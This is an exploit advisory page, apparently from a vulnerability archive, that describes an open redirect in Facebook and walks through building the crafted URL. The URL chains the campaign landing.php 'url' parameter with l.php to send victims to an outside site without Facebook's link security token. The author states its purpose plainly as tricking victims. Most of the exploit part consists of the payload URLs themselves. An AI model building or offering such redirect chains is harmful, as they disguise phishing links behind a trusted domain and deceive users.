Facebook Open Redirection

2013.11.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

# Exploit Title: Facebook URL open Redirection # Date: 05/11/2013 - 01/01/1435 # Exploit Author: The Black Devils " Asesino04" # Vendor Homepage: http://www.facebook.com/ # Tested on: Mozilla firefox ------------------------------------------------ First let's talk about redirection in facebook when you send a link to someone in facebook chat or post facebook create a security token for every single link , so your link must be like that so you can rediect http://www.facebook.com/l.php?u=attackersite.com&h=security token using this exploit you wont need security token and you can trick victimes easily ------------------------------------------------ # You go this page https://developers.facebook.com/docs/android/ and you copy the link of "download sdk" https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://developers.facebook.com/resources/facebook-android-sdk-current.zip # you keep only this https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url= # then you add to it https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F #so it became like that : https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top